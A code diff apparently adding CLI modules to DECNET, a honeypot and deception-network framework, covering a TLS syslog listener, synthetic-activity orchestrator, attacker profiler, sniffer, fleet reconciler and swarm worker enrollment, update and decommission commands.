                u.get("sub", ""),
                u.get("description", ""),
            )
        console.print(svc_table)
    def _render_psutil_fallback() -> None:
        registry = _utils._service_registry(str(DECNET_INGEST_LOG_FILE))
        if _agent_mode_active():
            registry = [r for r in registry if r[0] not in {"Mutator", "Profiler", "API"}]
        svc_table = Table(
            title="DECNET Services (psutil fallback — systemd unavailable)",
            show_lines=True,
        )
        svc_table.add_column("Service", style="bold cyan")
        svc_table.add_column("Status")
        svc_table.add_column("PID", style="dim")
        for name, match_fn, _launch_args in registry:
            pid = _utils._is_running(match_fn)
            if pid is not None:
                svc_table.add_row(name, "[green]UP[/]", str(pid))
            else:
                svc_table.add_row(name, "[red]DOWN[/]", "—")
        console.print(svc_table)
    @app.command()
    def teardown(
        all_: bool = typer.Option(False, "--all", help="Tear down all deckies and remove network"),
        id_: Optional[str] = typer.Option(None, "--id", help="Tear down a specific decky by name"),
    ) -> None:
        """Stop and remove deckies."""
        _require_master_mode("teardown")
        if not all_ and not id_:
            console.print("[red]Specify --all or --id <name>.[/]")
            raise typer.Exit(1)
        log.info("teardown command invoked all=%s id=%s", all_, id_)
        from decnet.engine import teardown as _teardown
        _teardown(decky_id=id_)
        log.info("teardown complete all=%s id=%s", all_, id_)
        if all_:
            _utils._kill_all_services()
--- a/decnet/cli/listener.py
+++ b/decnet/cli/listener.py
@@ -0,0 +1,58 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import asyncio
 import pathlib
 import signal
 from typing import Optional
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def listener(
        bind_host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the master syslog-TLS listener"),  # nosec B104
        bind_port: int = typer.Option(6514, "--port", help="Listener TCP port (RFC 5425 default 6514)"),
        log_path: Optional[str] = typer.Option(None, "--log-path", help="RFC 5424 forensic sink (default: ./master.log)"),
        json_path: Optional[str] = typer.Option(None, "--json-path", help="Parsed-JSON ingest sink (default: ./master.json)"),
        ca_dir: Optional[str] = typer.Option(None, "--ca-dir", help="DECNET CA dir (default: ~/.decnet/ca)"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the master-side syslog-over-TLS listener (RFC 5425, mTLS)."""
        from decnet.swarm import pki
        from decnet.swarm.log_listener import ListenerConfig, run_listener
        resolved_ca_dir = pathlib.Path(ca_dir) if ca_dir else pki.DEFAULT_CA_DIR
        resolved_log = pathlib.Path(log_path) if log_path else pathlib.Path("master.log")
        resolved_json = pathlib.Path(json_path) if json_path else pathlib.Path("master.json")
        cfg = ListenerConfig(
            log_path=resolved_log, json_path=resolved_json,
            bind_host=bind_host, bind_port=bind_port, ca_dir=resolved_ca_dir,
        )
        if daemon:
            log.info("listener daemonizing host=%s port=%d", bind_host, bind_port)
            _utils._daemonize()
        log.info("listener command invoked host=%s port=%d", bind_host, bind_port)
        console.print(f"[green]Starting DECNET log listener on {bind_host}:{bind_port} (mTLS)...[/]")
        async def _main() -> None:
            stop = asyncio.Event()
            loop = asyncio.get_running_loop()
            for sig in (signal.SIGTERM, signal.SIGINT):
                try:
                    loop.add_signal_handler(sig, stop.set)
                except (NotImplementedError, RuntimeError):  # pragma: no cover
                    pass
            await run_listener(cfg, stop_event=stop)
        try:
            asyncio.run(_main())
        except KeyboardInterrupt:
            pass
--- a/decnet/cli/orchestrator.py
+++ b/decnet/cli/orchestrator.py
@@ -0,0 +1,56 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 from typing import Optional
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command(name="orchestrate")
    def orchestrate_cmd(
        interval: int = typer.Option(
            60, "--interval", "-i",
            help="Seconds between synthetic activity ticks",
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process",
        ),
        llm: Optional[bool] = typer.Option(
            None, "--llm/--no-llm",
            help=(
                "Enable / disable LLM enrichment of user-class file "
                "bodies.  Default reads $DECNET_REALISM_LLM (any "
                "non-empty value enables; 'off' / unset disables)."
            ),
        ),
    ) -> None:
        """Inject synthetic life (inter-decky traffic + file ops + email) into the fleet."""
        import asyncio
        from decnet.orchestrator import orchestrator_worker
        from decnet.web.dependencies import repo
        if daemon:
            log.info("orchestrator daemonizing interval=%d", interval)
            _utils._daemonize()
        log.info(
            "orchestrator starting interval=%d llm=%s",
            interval, "default" if llm is None else ("on" if llm else "off"),
        )
        console.print(
            f"[bold cyan]Orchestrator starting[/] (interval: {interval}s)"
        )
        async def _run() -> None:
            await repo.initialize()
            await orchestrator_worker(repo, interval=interval, llm_enabled=llm)
        try:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Orchestrator stopped.[/]")
--- a/decnet/cli/profiler.py
+++ b/decnet/cli/profiler.py
@@ -0,0 +1,35 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command(name="profiler")
    def profiler_cmd(
        interval: int = typer.Option(30, "--interval", "-i", help="Seconds between profile rebuild cycles"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the attacker profiler as a standalone microservice."""
        import asyncio
        from decnet.profiler import attacker_profile_worker
        from decnet.web.dependencies import repo
        if daemon:
            log.info("profiler daemonizing interval=%d", interval)
            _utils._daemonize()
        log.info("profiler starting interval=%d", interval)
        console.print(f"[bold cyan]Profiler starting[/] (interval: {interval}s)")
        async def _run() -> None:
            await repo.initialize()
            await attacker_profile_worker(repo, interval=interval)
        try:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Profiler stopped.[/]")
--- a/decnet/cli/realism.py
+++ b/decnet/cli/realism.py
@@ -0,0 +1,112 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """``decnet realism ...`` — content-engine maintenance commands.
 After stage 5 of the realism migration, this is the only remaining
 CLI surface from the realism library / former emailgen.  ``decnet
 realism run`` does not exist (the orchestrator runs the unified
 worker via ``decnet orchestrate``); the only sub-command is
 ``import-personas``, which validates + installs the host-wide global
 persona pool consumed by fleet (MACVLAN/IPVLAN) and SWARM-shard
 deckies.
 Topology personas live on ``Topology.email_personas`` and are
 managed via the dashboard or the topology API; this command does
 not touch them.
 """
 from __future__ import annotations
 import json
 from pathlib import Path
 from typing import Optional
 import typer
 from .gating import _require_master_mode
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    realism_app = typer.Typer(
        name="realism",
        help=(
            "Maintain the realism content engine (persona pool import, "
            "future content-class tuning)."
        ),
    )
    app.add_typer(realism_app, name="realism")
    @realism_app.command("import-personas")
    def realism_import_personas(
        path: Path = typer.Argument(
            ..., exists=True, file_okay=True, dir_okay=False, readable=True,
            help="JSON file containing a list of EmailPersona objects",
        ),
        output: Optional[Path] = typer.Option(
            None, "--output", "-o",
            help=(
                "Override the destination path.  Defaults to the canonical "
                "global pool (DECNET_REALISM_PERSONAS, /etc/decnet/"
                "email_personas.json, or ~/.decnet/email_personas.json)."
            ),
        ),
    ) -> None:
        """Validate + install a personas JSON file as the global pool.
        Use this when deploying with IMAP/POP3 services on fleet
        (MACVLAN/IPVLAN) or SWARM-shard mail deckies — those have no
        parent topology row, so they read this host-wide list.
        MazeNET topology mail deckies use ``Topology.email_personas``
        instead and this command does not touch them.
        """
        _require_master_mode("realism import-personas")
        from decnet.realism import personas_pool as global_pool
        from decnet.realism.personas import parse_personas
        try:
            raw = path.read_text(encoding="utf-8")
        except OSError as exc:
            console.print(f"[red]Cannot read {path}:[/] {exc}")
            raise typer.Exit(code=1) from exc
        try:
            payload = json.loads(raw)
        except json.JSONDecodeError as exc:
            console.print(f"[red]Invalid JSON in {path}:[/] {exc}")
            raise typer.Exit(code=1) from exc
        if not isinstance(payload, list):
            console.print(
                f"[red]{path} must contain a JSON list of personas, "
                f"got {type(payload).__name__}[/]"
            )
            raise typer.Exit(code=1)
        personas = parse_personas(payload)
        if not personas:
            console.print(
                f"[red]No valid personas in {path}.[/] "
                "Check the schema (name, email, role, tone, mannerisms)."
            )
            raise typer.Exit(code=1)
        if len(personas) < 2:
            console.print(
                f"[yellow]Warning: only {len(personas)} valid persona(s) — "
                "the worker requires at least 2 to send mail; importing "
                "anyway in case more are added later.[/]"
            )
        dest = output or global_pool.resolve_path()
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_text(
            json.dumps(
                [p.model_dump(exclude_none=False) for p in personas],
                indent=2,
                ensure_ascii=False,
            ),
            encoding="utf-8",
        )
        global_pool.reset_cache()
        console.print(
            f"[green]Imported {len(personas)} personas to[/] {dest}"
        )
        if path != dest:
            log.info("realism import-personas src=%s dest=%s", path, dest)
--- a/decnet/cli/reconciler.py
+++ b/decnet/cli/reconciler.py
@@ -0,0 +1,63 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command(name="reconcile")
    def reconcile_cmd(
        once: bool = typer.Option(
            False, "--once",
            help="Run a single reconcile pass and exit (no daemon loop).",
        ),
        interval: int = typer.Option(
            30, "--interval", "-i",
            help="Seconds between reconcile passes (ignored with --once).",
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process (long-lived only).",
        ),
    ) -> None:
        """Converge fleet state across decnet-state.json, the DB, and docker."""
        import asyncio
        from decnet.web.dependencies import repo
        if once:
            from decnet.fleet.reconciler import reconcile_once
            async def _one() -> None:
                await repo.initialize()
                counts = await reconcile_once(repo)
                console.print(
                    f"[bold cyan]reconcile:[/] "
                    f"inserted={counts['inserted']} "
                    f"deleted={counts['deleted']} "
                    f"state_updated={counts['state_updated']}"
                )
            asyncio.run(_one())
            return
        from decnet.fleet.reconciler_worker import fleet_reconciler_worker
        if daemon:
            log.info("reconciler daemonizing interval=%d", interval)
            _utils._daemonize()
        log.info("reconciler starting interval=%d", interval)
        console.print(
            f"[bold cyan]Fleet reconciler starting[/] (interval: {interval}s)"
        )
        async def _run() -> None:
            await repo.initialize()
            await fleet_reconciler_worker(repo, interval=interval)
        try:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Reconciler stopped.[/]")
--- a/decnet/cli/sniffer.py
+++ b/decnet/cli/sniffer.py
@@ -0,0 +1,32 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from decnet.env import DECNET_INGEST_LOG_FILE
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command(name="sniffer")
    def sniffer_cmd(
        log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to write captured syslog + JSON records"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the network sniffer as a standalone microservice."""
        import asyncio
        from decnet.sniffer import sniffer_worker
        if daemon:
            log.info("sniffer daemonizing log_file=%s", log_file)
            _utils._daemonize()
        log.info("sniffer starting log_file=%s", log_file)
        console.print(f"[bold cyan]Sniffer starting[/] → {log_file}")
        try:
            asyncio.run(sniffer_worker(log_file))
        except KeyboardInterrupt:
            console.print("\n[yellow]Sniffer stopped.[/]")
--- a/decnet/cli/swarm.py
+++ b/decnet/cli/swarm.py
@@ -0,0 +1,347 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """`decnet swarm ...` — master-side operator commands (HTTP to local swarmctl)."""
 from __future__ import annotations
 from typing import Optional
 import typer
 from rich.table import Table
 from . import utils as _utils
 from .utils import console
 def register(app: typer.Typer) -> None:
    swarm_app = typer.Typer(
        name="swarm",
        help="Manage swarm workers (enroll, list, decommission). Requires `decnet swarmctl` running.",
        no_args_is_help=True,
    )
    app.add_typer(swarm_app, name="swarm")
    @swarm_app.command("enroll")
    def swarm_enroll(
        name: str = typer.Option(..., "--name", help="Short hostname for the worker (also the cert CN)"),
        address: str = typer.Option(..., "--address", help="IP or DNS the master uses to reach the worker"),
        agent_port: int = typer.Option(8765, "--agent-port", help="Worker agent TCP port"),
        sans: Optional[str] = typer.Option(None, "--sans", help="Comma-separated extra SANs for the worker cert"),
        notes: Optional[str] = typer.Option(None, "--notes", help="Free-form operator notes"),
        out_dir: Optional[str] = typer.Option(None, "--out-dir", help="Write the bundle (ca.crt/worker.crt/worker.key) to this dir for scp"),
        updater: bool = typer.Option(False, "--updater", help="Also issue an updater-identity cert (CN=updater@<name>) for the remote self-updater"),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL (default: 127.0.0.1:8770)"),
    ) -> None:
        """Issue a mTLS bundle for a new worker and register it in the swarm."""
        import pathlib as _pathlib
        body: dict = {"name": name, "address": address, "agent_port": agent_port}
        if sans:
            body["sans"] = [s.strip() for s in sans.split(",") if s.strip()]
        if notes:
            body["notes"] = notes
        if updater:
            body["issue_updater_bundle"] = True
        resp = _utils._http_request("POST", _utils._swarmctl_base_url(url) + "/swarm/enroll", json_body=body)
        data = resp.json()
        console.print(f"[green]Enrolled worker:[/] {data['name']}  "
                      f"[dim]uuid=[/]{data['host_uuid']}  "
                      f"[dim]fingerprint=[/]{data['fingerprint']}")
        if data.get("updater"):
            console.print(f"[green]  + updater identity[/] "
                          f"[dim]fingerprint=[/]{data['updater']['fingerprint']}")
        if out_dir:
            target = _pathlib.Path(out_dir).expanduser()
            target.mkdir(parents=True, exist_ok=True)
            (target / "ca.crt").write_text(data["ca_cert_pem"])
            (target / "worker.crt").write_text(data["worker_cert_pem"])
            (target / "worker.key").write_text(data["worker_key_pem"])
            for leaf in ("worker.key",):
                try:
                    (target / leaf).chmod(0o600)
                except OSError:
                    pass
            console.print(f"[cyan]Agent bundle written to[/] {target}")
            if data.get("updater"):
                upd_target = target.parent / f"{target.name}-updater"
                upd_target.mkdir(parents=True, exist_ok=True)
                (upd_target / "ca.crt").write_text(data["ca_cert_pem"])
                (upd_target / "updater.crt").write_text(data["updater"]["updater_cert_pem"])
                (upd_target / "updater.key").write_text(data["updater"]["updater_key_pem"])
                try:
                    (upd_target / "updater.key").chmod(0o600)
                except OSError:
                    pass
                console.print(f"[cyan]Updater bundle written to[/] {upd_target}")
                console.print("[dim]Ship the agent dir to ~/.decnet/agent/ and the updater dir to ~/.decnet/updater/ on the worker.[/]")
            else:
                console.print("[dim]Ship this directory to the worker at ~/.decnet/agent/ (or wherever `decnet agent --agent-dir` points).[/]")
        else:
            console.print("[yellow]No --out-dir given — bundle PEMs are in the JSON response; persist them before leaving this shell.[/]")
    @swarm_app.command("list")
    def swarm_list(
        host_status: Optional[str] = typer.Option(None, "--status", help="Filter by status (enrolled|active|unreachable|decommissioned)"),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
    ) -> None:
        """List enrolled workers."""
        q = f"?host_status={host_status}" if host_status else ""
        resp = _utils._http_request("GET", _utils._swarmctl_base_url(url) + "/swarm/hosts" + q)
        rows = resp.json()
        if not rows:
            console.print("[dim]No workers enrolled.[/]")
            return
        table = Table(title="DECNET swarm workers")
        for col in ("name", "address", "port", "status", "last heartbeat", "enrolled"):
            table.add_column(col)
        for r in rows:
            table.add_row(
                r.get("name") or "",
                r.get("address") or "",
                str(r.get("agent_port") or ""),
                r.get("status") or "",
                str(r.get("last_heartbeat") or "—"),
                str(r.get("enrolled_at") or "—"),
            )
        console.print(table)
    @swarm_app.command("check")
    def swarm_check(
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
        json_out: bool = typer.Option(False, "--json", help="Emit JSON instead of a table"),
    ) -> None:
        """Actively probe every enrolled worker and refresh status + last_heartbeat."""
        resp = _utils._http_request("POST", _utils._swarmctl_base_url(url) + "/swarm/check", timeout=60.0)
        payload = resp.json()
        results = payload.get("results", [])
        if json_out:
            console.print_json(data=payload)
            return
        if not results:
            console.print("[dim]No workers enrolled.[/]")
            return
        table = Table(title="DECNET swarm check")
        for col in ("name", "address", "reachable", "detail"):
            table.add_column(col)
        for r in results:
            reachable = r.get("reachable")
            mark = "[green]yes[/]" if reachable else "[red]no[/]"
            detail = r.get("detail")
            detail_str = "—"
            if isinstance(detail, dict):
                detail_str = detail.get("status") or ", ".join(f"{k}={v}" for k, v in detail.items())
            elif detail is not None:
                detail_str = str(detail)
            table.add_row(
                r.get("name") or "",
                r.get("address") or "",
                mark,
                detail_str,
            )
        console.print(table)
    @swarm_app.command("update")
    def swarm_update(
        host: Optional[str] = typer.Option(None, "--host", help="Target worker (name or UUID). Omit with --all."),
        all_hosts: bool = typer.Option(False, "--all", help="Push to every enrolled worker."),
        include_self: bool = typer.Option(False, "--include-self", help="Also push to each updater's /update-self after a successful agent update."),
        root: Optional[str] = typer.Option(None, "--root", help="Source tree to tar (default: CWD)."),
        exclude: list[str] = typer.Option([], "--exclude", help="Additional exclude glob. Repeatable."),
        updater_port: int = typer.Option(8766, "--updater-port", help="Port the workers' updater listens on."),
        dry_run: bool = typer.Option(False, "--dry-run", help="Build the tarball and print stats; no network."),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL."),
    ) -> None:
        """Push the current working tree to workers' self-updaters (with auto-rollback on failure)."""
        import asyncio
        import pathlib as _pathlib
        from decnet.swarm.tar_tree import tar_working_tree, detect_git_sha
        from decnet.swarm.updater_client import UpdaterClient
        if not (host or all_hosts):
            console.print("[red]Supply --host <name> or --all.[/]")
            raise typer.Exit(2)
        if host and all_hosts:
            console.print("[red]--host and --all are mutually exclusive.[/]")
            raise typer.Exit(2)
        base = _utils._swarmctl_base_url(url)
        resp = _utils._http_request("GET", base + "/swarm/hosts")
        rows = resp.json()
        if host:
            targets = [r for r in rows if r.get("name") == host or r.get("uuid") == host]
            if not targets:
                console.print(f"[red]No enrolled worker matching '{host}'.[/]")
                raise typer.Exit(1)
        else:
            targets = [r for r in rows if r.get("status") != "decommissioned"]
        if not targets:
            console.print("[dim]No targets.[/]")
            return
        tree_root = _pathlib.Path(root) if root else _pathlib.Path.cwd()
        sha = detect_git_sha(tree_root)
        console.print(f"[dim]Tarring[/] {tree_root} [dim]sha={sha or '(not a git repo)'}[/]")
        tarball = tar_working_tree(tree_root, extra_excludes=exclude)
        console.print(f"[dim]Tarball size:[/] {len(tarball):,} bytes")
        if dry_run:
            console.print("[yellow]--dry-run: not pushing.[/]")
            for t in targets:
                console.print(f"  would push to [cyan]{t.get('name')}[/] at {t.get('address')}:{updater_port}")
            return
        async def _push_one(h: dict) -> dict:
            name = h.get("name") or h.get("uuid")
            out: dict = {"name": name, "address": h.get("address"), "agent": None, "self": None}
            try:
                async with UpdaterClient(h, updater_port=updater_port) as u:
                    r = await u.update(tarball, sha=sha)
                    out["agent"] = {"status": r.status_code, "body": r.json() if r.content else {}}
                    if r.status_code == 200 and include_self:
                        rs = await u.update_self(tarball, sha=sha)
                        out["self"] = {"status": rs.status_code, "body": rs.json() if rs.content else {}}
            except Exception as exc:  # noqa: BLE001
                out["error"] = f"{type(exc).__name__}: {exc}"
            return out
        async def _push_all() -> list[dict]:
            return await asyncio.gather(*(_push_one(t) for t in targets))
        results = asyncio.run(_push_all())
        table = Table(title="DECNET swarm update")
        for col in ("host", "address", "agent", "self", "detail"):
            table.add_column(col)
        any_failure = False
        for r in results:
            agent = r.get("agent") or {}
            selff = r.get("self") or {}
            err = r.get("error")
            if err:
                any_failure = True
                table.add_row(r["name"], r.get("address") or "", "[red]error[/]", "—", err)
                continue
            a_status = agent.get("status")
            if a_status == 200:
                agent_cell = "[green]updated[/]"
            elif a_status == 409:
                agent_cell = "[yellow]rolled-back[/]"
                any_failure = True
            else:
                agent_cell = f"[red]{a_status}[/]"
                any_failure = True
            if not include_self:
                self_cell = "—"
            elif selff.get("status") == 200 or selff.get("status") is None:
                self_cell = "[green]ok[/]" if selff else "[dim]skipped[/]"
            else:
                self_cell = f"[red]{selff.get('status')}[/]"
            detail = ""
            body = agent.get("body") or {}
            if isinstance(body, dict):
                detail = body.get("release", {}).get("sha") or body.get("detail", {}).get("error") or ""
            table.add_row(r["name"], r.get("address") or "", agent_cell, self_cell, str(detail)[:80])
        console.print(table)
        if any_failure:
            raise typer.Exit(1)
    @swarm_app.command("deckies")
    def swarm_deckies(
        host: Optional[str] = typer.Option(None, "--host", help="Filter by worker name or UUID"),
        state: Optional[str] = typer.Option(None, "--state", help="Filter by shard state (pending|running|failed|torn_down)"),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
        json_out: bool = typer.Option(False, "--json", help="Emit JSON instead of a table"),
    ) -> None:
        """List deployed deckies across the swarm with their owning worker host."""
        base = _utils._swarmctl_base_url(url)
        host_uuid: Optional[str] = None
        if host:
            resp = _utils._http_request("GET", base + "/swarm/hosts")
            rows = resp.json()
            match = next((r for r in rows if r.get("uuid") == host or r.get("name") == host), None)
            if match is None:
                console.print(f"[red]No enrolled worker matching '{host}'.[/]")
                raise typer.Exit(1)
            host_uuid = match["uuid"]
        query = []
        if host_uuid:
            query.append(f"host_uuid={host_uuid}")
        if state:
            query.append(f"state={state}")
        path = "/swarm/deckies" + ("?" + "&".join(query) if query else "")
        resp = _utils._http_request("GET", base + path)
        rows = resp.json()
        if json_out:
            console.print_json(data=rows)
            return
        if not rows:
            console.print("[dim]No deckies deployed.[/]")
            return
        table = Table(title="DECNET swarm deckies")
        for col in ("decky", "host", "address", "state", "services"):
            table.add_column(col)
        for r in rows:
            services = ",".join(r.get("services") or []) or "—"
            state_val = r.get("state") or "pending"
            colored = {
                "running": f"[green]{state_val}[/]",
                "failed": f"[red]{state_val}[/]",
                "pending": f"[yellow]{state_val}[/]",
                "torn_down": f"[dim]{state_val}[/]",
            }.get(state_val, state_val)
            table.add_row(
                r.get("decky_name") or "",
                r.get("host_name") or "<unknown>",
                r.get("host_address") or "",
                colored,
                services,
            )
        console.print(table)
    @swarm_app.command("decommission")
    def swarm_decommission(
        name: Optional[str] = typer.Option(None, "--name", help="Worker hostname"),
        uuid: Optional[str] = typer.Option(None, "--uuid", help="Worker UUID (skip lookup)"),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
        yes: bool = typer.Option(False, "--yes", "-y", help="Skip interactive confirmation"),
    ) -> None:
        """Remove a worker from the swarm (cascades decky shard rows)."""
        if not (name or uuid):
            console.print("[red]Supply --name or --uuid.[/]")
            raise typer.Exit(2)
        base = _utils._swarmctl_base_url(url)
        target_uuid = uuid
        target_name = name
        if target_uuid is None:
            resp = _utils._http_request("GET", base + "/swarm/hosts")
            rows = resp.json()
            match = next((r for r in rows if r.get("name") == name), None)
            if match is None:
                console.print(f"[red]No enrolled worker named '{name}'.[/]")
                raise typer.Exit(1)
            target_uuid = match["uuid"]
            target_name = match.get("name") or target_name
        if not yes:
            confirm = typer.confirm(f"Decommission worker {target_name!r} ({target_uuid})?", default=False)
            if not confirm:
                console.print("[dim]Aborted.[/]")
                raise typer.Exit(0)
        _utils._http_request("DELETE", f"{base}/swarm/hosts/{target_uuid}")
        console.print(f"[green]Decommissioned {target_name or target_uuid}.[/]")
--- a/decnet/cli/swarmctl.py
+++ b/decnet/cli/swarmctl.py
@@ -0,0 +1,113 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import os
 import signal
 import subprocess  # nosec B404
 import sys
 from typing import Optional
 import typer
 from . import utils as _utils
 from .gating import _require_master_mode
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def swarmctl(
        port: int = typer.Option(
            8770, "--port",
            envvar="DECNET_SWARMCTL_PORT",
            help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
        ),
        host: str = typer.Option(
            "127.0.0.1", "--host",
            envvar="DECNET_SWARMCTL_HOST",
            help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
        ),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
        tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
        cert: Optional[str] = typer.Option(None, "--cert", help="BYOC: path to TLS server cert (PEM). Auto-issues from the DECNET CA if omitted."),
        key: Optional[str] = typer.Option(None, "--key", help="BYOC: path to TLS server private key (PEM)."),
        client_ca: Optional[str] = typer.Option(None, "--client-ca", help="CA bundle used to verify worker client certs. Defaults to the DECNET CA."),
    ) -> None:
        """Run the DECNET SWARM controller (master-side, separate process from `decnet api`).
        By default, `decnet swarmctl` auto-spawns `decnet listener` as a fully-
        detached sibling process so the master starts accepting forwarder
        connections on 6514 without a second manual invocation. The listener
        survives swarmctl restarts and crashes — if it dies on its own,
        restart it manually with `decnet listener --daemon …`. Pass
        --no-listener to skip.
        Pass ``--tls`` to serve over HTTPS with mutual-TLS enforcement. By
        default the server cert is auto-issued from the DECNET CA under
        ``~/.decnet/swarmctl/`` so enrolled workers (which already ship that
        CA's ``ca.crt``) trust it out of the box. BYOC via ``--cert``/``--key``
        if you need a publicly-trusted or externally-managed cert.
        """
        _require_master_mode("swarmctl")
        if daemon:
            log.info("swarmctl daemonizing host=%s port=%d", host, port)
            _utils._daemonize()
        if not no_listener:
            listener_host = os.environ.get("DECNET_LISTENER_HOST", "0.0.0.0")  # nosec B104
            listener_port = int(os.environ.get("DECNET_SWARM_SYSLOG_PORT", "6514"))
            lst_argv = [
                sys.executable, "-m", "decnet", "listener",
                "--host", listener_host,
                "--port", str(listener_port),
                "--daemon",
            ]
            try:
                pid = _utils._spawn_detached(lst_argv, _utils._pid_dir() / "listener.pid")
                log.info("swarmctl auto-spawned listener pid=%d bind=%s:%d",
                         pid, listener_host, listener_port)
                console.print(f"[dim]Auto-spawned listener (pid {pid}) on {listener_host}:{listener_port}.[/]")
            except Exception as e:  # noqa: BLE001
                log.warning("swarmctl could not auto-spawn listener: %s", e)
                console.print(f"[yellow]listener auto-spawn skipped: {e}[/]")
        log.info("swarmctl command invoked host=%s port=%d tls=%s", host, port, tls)
        scheme = "https" if tls else "http"
        console.print(f"[green]Starting DECNET SWARM controller on {scheme}://{host}:{port}...[/]")
        _cmd = [sys.executable, "-m", "uvicorn", "decnet.web.swarm_api:app",
                "--host", host, "--port", str(port)]
        if tls:
            from decnet.swarm import pki as _pki
            if cert and key:
                cert_path, key_path = cert, key
            elif cert or key:
                console.print("[red]--cert and --key must be provided together.[/]")
                raise typer.Exit(code=2)
            else:
                auto_cert, auto_key, _auto_ca = _pki.ensure_swarmctl_cert(host)
                cert_path, key_path = str(auto_cert), str(auto_key)
                console.print(f"[dim]Auto-issued swarmctl server cert → {cert_path}[/]")
            ca_path = client_ca or str(_pki.DEFAULT_CA_DIR / "ca.crt")
            _cmd += [
                "--ssl-keyfile", key_path,
                "--ssl-certfile", cert_path,
                "--ssl-ca-certs", ca_path,
                "--ssl-cert-reqs", "2",
            ]
        try:
            proc = subprocess.Popen(_cmd, start_new_session=True)  # nosec B603 B404
            try:
                proc.wait()
            except KeyboardInterrupt:
                try:
                    os.killpg(proc.pid, signal.SIGTERM)
                    try:
                        proc.wait(timeout=10)
                    except subprocess.TimeoutExpired:
                        os.killpg(proc.pid, signal.SIGKILL)
                        proc.wait()
                except ProcessLookupError:
                    pass
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start swarmctl. Ensure 'uvicorn' is installed in the current environment.[/]")
--- a/Show More
+++ b/Show More
		`@@ -1 +0,0 @@`
			`Collector starting → /home/anti/Tools/DECNET/decnet.log`
		`@@ -0,0 +1 @@`
							`"""Artifact storage helpers shared between the web router and TTP workers."""`